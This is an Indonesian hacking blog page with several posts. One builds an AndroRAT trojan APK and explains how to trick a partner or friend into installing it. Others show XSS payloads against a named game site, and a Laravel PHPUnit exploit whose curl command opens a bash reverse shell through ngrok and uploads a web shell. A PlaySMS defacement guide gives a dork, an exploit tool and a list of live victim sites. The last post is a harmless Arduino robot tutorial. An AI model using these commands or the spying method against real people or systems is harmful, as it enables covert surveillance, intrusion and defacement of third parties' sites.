-->

Cara Meretas Smartphone Android Dengan AndroRAT

 

Hallo apa kabar ketemu lagi sama saya tubagus, kali ini saya akan memberikan tutorial bagaimana sih caranya meretas atau istilah kerennya ngehack smartphone android orang yang deket sama kita seperti pacar, sahabat, teman, atau pun orang lain. Pasti diantara kalian pada pengen tau apa isi dari smartphone target kalian siapa tau kan dia menyimpan sesuatu.

PERHATIAN:
Tutorial ini saya bagikan untuk pembelajaran kalian saja, jika kalian menggunakannya karena hal tertentu saya tidak bertanggung jawab atas hal tersebut.

Sebelum masuk ke tutorial kalian harus menginstall Java jdk 8 dan Python 3, disini saya tidak akan menjelaskan bagaimana cara installnya kalian bisa cari digoogle. Oh iya tutorial ini hanya bisa dilakukan di Laptop/PC untuk android saya belum mencobanya mungkin lain waktu saya coba bisa atau tidaknya.

Yang dibutuhkan:
Java JDK 8
Python 3 versi 3.6 keatas
Laptop atau PC

Jika sudah menginstall java dan python download toolsnya di link biru diatas, exstrak tools ysng sudah di download tadi, maka kalian akan melihat banyak file seperti gambar dibawah ini.
Di kolom lokasi folder kalian ketikan cmd, lalu klik enter seperti gambar dibawah ini.
Maka akan terbuka windows cmd, seperti gambar dibawah ini.
Setelah cmd terbuka kita akan membuat port forwarding nya kalian daftar dulu disini, lalu verifikasi email kalian dan login pake akun tersebut. Klik configuration diatas lalu klik new configuration, seperti gambar dibawah ini.

Isi nama terserah kalian mau dikasih nama apa saja untuk proto pilih tcp, seperti gambar dibawah ini.
Klik generate, setelah di generate klik download.
Scroll keatas klik Mapping Rules, lalu klik Create new rule di Port on your PC isikan port terserah kalian sebagai contoh saya isikan 8989, seperti gambar dibawah ini.

Klik create setelah itu kalian download dulu ovpn nya disini, pilih yang sesuai dengan pc kalian. Setelah download selesai kalian buka aplikasinya lalu install seperti biasa.
Lihat di kanan bawah klik panah atas lalu di icon komputer klik import, seperti gambar dibawah ini.
Cari config ovpn yang pertama kita buat di tutorial sebelumnya.
Klik open, maka config akan sukses di import selanjutnya di bawah kanan klik panah atas lalu klik kanan pada icon komputer pilih config yang kita import tadi lalu klik connect. Seperti gambar dibawah ini.
Lihat icon komputer tadi kalau iconnya berwarna hijau berarti confignya sudah konek. Selanjutnya buka web portmap io nya lagi di Mapping Rules perhatikan rule nya copy hanya hostnya saja, contoh: Tubagusnm19-24237.portmap.host, seperti gambar dibawah ini.
Setelah dicopy rule nya pergi kesini, pastekan di kolomnya lalu klik check now nanti akan muncul hasilnya seperti gambar dibawah ini.
Copy ip addres tersebut, lalu buka cmd yang sebelumnya sudah dibuka ketikan command berikut:
python androRAT.py --build -i [ip addres] -p [port] -o [apps.apk]

Contoh:
python androRAT.py --build -i 193.161.193.99 -p 24237 -o aplikasiku.apk

penjelasan:
-i ip addres isikan yang kita copy tadi.
-p port isikan port yang ada di portmap io, perhatikan di tutorial sebelumnya di dekat garis yang saya tandain ada port itulah yang kita pake.
-o output isikan terserah asalkan tambahkan extensi .apk diakhir nama.

Klik enter maka tools akan membuat aplikasi otomatis tunggu proses pembuatannya selesai. Jika pembuatanya sudah selesai maka akan keluar output seperti gambar dibawah ini.
Pergi ke portmap io masih di Mapping Rules di rules sebagai contoh copy port 8989, perhatikan gambar dibawah ini.
Setelah itu ketikan command dibawah ini:
python androRAT.py --shell -i 0.0.0.0 -p [port]

contoh:
python androRAT.py --shell -i 0.0.0.0 -p 8989

penjelasan:
-i listner IP address
-p listner port number

Klik enter, selanjutnya kalian kirimkan aplikasi yang kita buat tadi ke target kamu, supaya si target kalian memasang dan membuka aplikasi itu kalian harus menggunakan metode social engineering, social engineering itu apa? semacam trik untuk manipulasi atau mengelabui target supaya target mengikuti perintah kita untuk mendapatkan informasi yang kita cari. Selebihnya tentang social engineering disini.

Setelah kalian berhasil soceng target kalian, buka cmd kalian dan lihat apabila tampilannya seperti gambar dibawah ini maka kalian berhasil meretas hp target kalian.
Untuk command-commandnya bisa di lihat di githubnya AndroRAT disini.

Mungkin cukup sekian tutorial dari saya semoga bermanfaat dan ingat jangan melalukan kejahatan, tetaplah berbuat baik walau disekeliling kita banyak kejahatan. Saya tubagus, terima kasih sudah mampir.

Reflected XSS On Website PointBlank

Assalamualikum, Saya Akan sedikit Sharing Penemuan Bug saya Pada Website PointBlank, Game FPS No 1 Di 
Indonesia. 





Langsung Saja Ke POC

#Reflected XSS

Setelah Menggunakan Tools Link-Crawler Saya Menemukan Parameter URL Di bawah Ini.


-Saya Mencoba Memasukan Value Pada Param, SaleName=
Dan Mencoba Untuk Mem Bypass Nya ">


Response Dari Server,



-Saya Coba lagi Untuk Memasukan Payload XSS, <svg/onload=alert(document.domain)> DAN Boom. Payload berhasil Ter eksekusi


Respon Dari Server,



-Saya Coba Mengambil Cookie Saya Sendiri. Dengan Payload "<script>alert(document.cookie);</script>"




XSS Ter Eksekusi,


Salam Hangat Troppers 2014

-Fauzan72

LARAVEL PHPUNIT RCE TO REVERSE SHELL WITH NGROK


Hallo teman-teman ketemu lagi sama saya, kali ini saya akan memberikan sebuah tutorial yang mungkin teman-teman lagi cari. Pasti teman-teman pernah menemukan sebuah website yang menggunakan Laravel dan pluginsnya tersebut Vuln tapi ketika teman-teman mengexploitasinya gagal bagaimana mengatasi masalah tersebut?, Ayo simak tutorialnya.

Pastikan teman-teman sudah menginstal Netcat dan Ngrok, dan jangan lupa untuk menyiapkan target yang menurut teman-teman Vuln.

Jika sudah mendapatkan target yg menurut teman-teman Vuln buka Terminal kesukaan teman-teman kalow saya di PC menggunakan WSL teman-teman juga bisa menggunakan TERMUX di HP (android) kalian.

Jalankan Ngroknya dengan mengetikan command dibawah ini.

Command:
./ngrok tcp [port kalian]
Example:
./ngrok tcp 1337
kemudian tekan enter, jika Ngrok berjalan dengan lancar akan ada tulisan online yang berwarna hijau. Lihat gambar dibawah ini.

Buka tab Terminal baru dan jalankan netcatnya dengan mengetikan command dibawah ini.

Command:
nc -lnvp [port ngrok tadi]
Example:
nc -lnvp 1337
kemudian tekan enter, jika Netcat berjalan dengan lancar akan ada tulisan Listening on blablabla. Lihat gambar dibawah ini.

Buka tab Terminal baru lagi dan kita akan mengexploit target yg teman-teman sudah siapkan, kemudian ketikan command RCE dibawah ini.

Command:
curl -d "<?php system('bash -i >& /dev/tcp/[host]/[port] 0>&1');?>" [target kalian]/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Example:
curl -d "<?php system('bash -i >& /dev/tcp/0.tcp.ngrok.io/18568 0>&1');?>" http://evilsite,com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
 
kemudian tekan enter, dan lihat tab Netcat jika ada tulisan bash: no job control in this shell berarti teman-teman telah success reverse shell.
Disini teman-teman bisa menggunakan command-command yg ada di linux seperti cd, ls, dll. Untuk mengupload shell backdoor teman-teman bisa menggunakan command Wget atau Curl, lihat contoh dibawah ini.

example curl:
curl -o namafile.php [url shell]
example wget:
wget -O namafile.php [url shell]
Baik teman-teman sekian dulu tutorial dari saya semoga bermanfaat.

Deface Poc PlaySMS RCE Upload Shell!!!




Yo wasaap gaes:'V

Oke gaes w baru pertama kali nulis blog akwowkok:'v

Kali ini w RHm7z ( arip gans ) bakal ngasih tutorial Deface poc RCE

Yaudah tanpa byk bcot skuyy dahh

Siapin Alat Tempurnya Boss
Termux ( Terminal Linux :'v )
- Dork Presh ( biar dapet web pwran :'v )
- Kuota Njing Jangan Lupa
- Face Gans :'v

Kalau alat tempur dah siap skuyy kita perang😎

Pertama dorking dulu ya asu

Dork : inurl:index.php?app=main intitle:playsms
lu kembangin lagi pake otak bkp lu :*

liat gambar dibwah😚 ada byk site tinggal cari aj yg msih perawan:'v

Kalo dah dapat site vuln sekuy dah langsung eksekusi mati akwokwok😈
Buka termux kalo blum ad donlod dlu gih
ketik command nya :

$ pkg update && pkg upgrade
$ pkg install git
$ pkg install php
$ git clone https://github.com/RHm7z/PlaySMSRCE/
$ cd PlaySMSRCE

udahh? kalo udh ketik :
$ php exp.php
kemudian masukan list web lu kek digambar dibawah

Shell sukses diupload!! 
Cara akses shellnya copy aj link ny bgst jan manja😈
Sukses cookk
Silahkuen lu upload sc depes lu^^

Happy Deface Bro ^_^
No Index No Party :V

Live Target : 
http://portal.it.na
https://sms.peoriaparks.org/playsms/
http://134.119.205.187
http://sms.nebrata.com
http://cloud.nebrata.com
http://sms33.telvoip.cl
http://80.78.79.178
http://bulksms.stine.co.zw
http://ivoirenetsms.com/

Membuat Robot Avoider dengan Arduino Uno



Assalamualaikum Wr.Wb

Alhamdulillah saya Masih diberi kesehatan Oleh Allah SWT sehingga dapat menulis pada blog ini

Okkey saya baru pertama kali Ngisi di Blog Ea :v

Sebelumnya kenalin gua Unravel72 Mem baru xixixixixi

Dan kali ini gua akan kasih tutor membuat robot Avoider menggunakan Board Arduino Uno.

Langsung aja Klean Nyimak ea

Okkey bahan bahan yang dibutuhkan adalah :



1. Software Arduino Uno
2.1x Board Arduino Uno
3.1x Motor Driver L298N
4.4x Motor DC (untuk roda)
5.1x Sensor Ultrasonik
6.1x Bat +9v untuk Motor Driver
7.1x Bat +9v untuk Arduino
8.Kabel jumper secukupnya.

Rangkain:

Keterangan Konfigurasi Kabel:
1.Hubungkan pin Vcc Ultrasonic ke pin +5v Arduino.
2.Hubungkan PIN  Echo Ultrasonic ke PIN 3 Arduino.
3.Hubungkan PIN Trigger Ultrasonic ke PIN 2 Arduino.
4.Hubungkan PIN ground Ultrasonic ke PIN ground Arduino.
5.Hubungkan PIN IN1 L298N ke PIN 7 Arduino.
6.Hubungkan PIN IN2 L298N ke PIN 6 Arduino.
7.Hubungkan PIN IN3 L298N ke PIN 5 Arduino.
8.Hubungkan PIN IN4 L298N ke PIN 4 Arduino.
9.Hubungkan +12v motor driver L298N ke PIN +9 BAT.
10.Hubungkan ground motor driver L298N ke BAT dan ke PIN ground Arduino.

Nah Kalau sudah kalian Buka Software Arduino Di dalam Leppy kalian.
Dan jangan lupa memilih format jenis Board Arduino yg Kalian Gunakan.
Dan Masuk kan script dibawah ini :

#include <NewPing.h>


#define TRIGGER_PIN  2  // Arduino pin tied to trigger pin on ping censor(CENTER censor)

#define ECHO_PIN     3 // Arduino pin tied to echo pin on ping censor(CENTER censor)

#define MAX_DISTANCE 200

NewPing sonar(TRIGGER_PIN, ECHO_PIN, MAX_DISTANCE);

unsigned int pingSpeed = 50;

unsigned long pingTimer;     // Holds the next ping time.

int distance;

int distanceL;

int distanceR;


//MotorSetting; Using DFRobot L298 2A Motor Controller


int M1 = 4;

int E1 = 5;

int M2 = 7;

int E2 = 6;

int pwm_speed;

int speedVal = 255;

//char command = '\0';


void setup() {

  Serial.begin(9600); // Open serial monitor at 9600 baud to see ping results.


  pinMode(M1, OUTPUT);

  pinMode(M2, OUTPUT);

  pinMode(10, OUTPUT);

  delay(250);

}


void loop() {

      distance  = sonar.ping_cm();

      Serial.println(distance);

      if (distance > 25){

        Drive("Forward");

        Serial.println("maju");

      }

      else if (distance < 25 && distance > 10)

      {

          Drive("TurnRight");

          delay(250);

          Drive("Stop");

          distanceR = sonar.ping_cm();

          Drive("TurnLeft");

          delay (250);

          Drive ("Stop");

          distanceL = sonar.ping_cm();

            if (distanceR > distanceL) {

              Drive ("TurnRight");

              Serial.println("kanan");

              delay (250);

              Drive ("Forward");

           

            }

            else {

              Drive ("TurnLeft");

              Serial.println("kiri");

              delay (250);

              Drive ("Forward");

            }

     }

     else {

        Drive ("Backward");

        Serial.println("mundur");

        delay (100);

        Drive ("Stop");

     }

}

//Mechatronic and Robotic//

//Electrical Engineering//

//Malikussaleh of University//



/////////////////Directions Setup/////////////////////////

void Drive(String Direction) {

  if (Direction == "Backward") {

    // Serial.println("Backward");

    analogWrite(E1, 255);

    analogWrite(E2, 255);

    digitalWrite(M1, LOW);

    digitalWrite(M2, LOW);

  }

  if (Direction == "Forward") {

    // Serial.print("Forward");

    analogWrite(E1, 255);

    analogWrite(E2, 255);

    digitalWrite(M1, HIGH);

    digitalWrite(M2, HIGH);

 

  }


  if (Direction == "Stop") {

    //Serial.print("Stop");

    analogWrite(E1, 0);

    analogWrite(E2, 0);

  }


  if (Direction == "TurnRight") {

    //Serial.print("Turning Right");

    analogWrite(E1, 255);

    analogWrite(E2, 255);

    digitalWrite(M1, LOW);

    digitalWrite(M2, HIGH);

  }


  if (Direction == "TurnLeft") {

    // Serial.print("Turning Left");

    analogWrite(E1, 255);

    analogWrite(E2, 255);

    digitalWrite(M1, HIGH);

    digitalWrite(M2, LOW);

  }

}


void test_speed() {

  // constrain speed value to between 0-255

  if (speedVal > 250) {

    speedVal = 255;

    Serial.println(" MAX ");

  }

  if (speedVal < 0) {

    speedVal = 0;

    Serial.println(" MIN ");

  }

}

//--------------------------------------

/*

long microsecondsToCentimeters(long microseconds) {

  // The speed of sound is 340 m/s or 29 microseconds per centimeter.

  // The ping travels out and back, so to find the distance of the

  // object we take half of the distance travelled.

  //return microseconds / 29 / 2;

  return microseconds / 10; //basically 58

}*/

/////////////////////////////////////////////////////////////////////////

Oh iya jangan Lupa Edit Kembali Script nya karena pasti ada kesalahan, Karena gua cuman manusia biasa yg banyak salahnya.

Dan sekian tutor Dari saya Semoga bermanfaat untuk kalian semua.. Dan Jangan Takut untuk mencoba.. Jika sudah mencoba jgn takut untuk gagal.

Nuun Walqalaami wamayasturun
Fastabiqul khairat, Syukron
Wassalamuallaikum Wr.Wb

Latest Posts

View all
Cara Meretas Smartphone Android Dengan AndroRAT

Cara Meretas Smartphone Android Dengan AndroRAT

Hallo apa kabar ketemu lagi sama saya tubagus, kali ini saya akan memberikan tutorial b…
Reflected XSS On Website PointBlank

Reflected XSS On Website PointBlank

Assalamualikum, Saya Akan sedikit Sharing Penemuan Bug saya Pada Website PointBlank, Game…
LARAVEL PHPUNIT RCE TO REVERSE SHELL WITH NGROK

LARAVEL PHPUNIT RCE TO REVERSE SHELL WITH NGROK

Hallo teman-teman ketemu lagi sama saya, kali ini saya akan memberikan sebuah tutori…
Deface Poc PlaySMS RCE Upload Shell!!!

Deface Poc PlaySMS RCE Upload Shell!!!

Yo wasaap gaes:'V Oke gaes w baru pertama kali nulis blog akwowkok:'v …
Membuat Robot Avoider dengan Arduino Uno

Membuat Robot Avoider dengan Arduino Uno

Assalamualaikum Wr.Wb Alhamdulillah saya Masih diberi kesehatan Oleh Allah SWT sehi…

© GT72 | BLOG. All Rights Reserved Theme by Jago Desain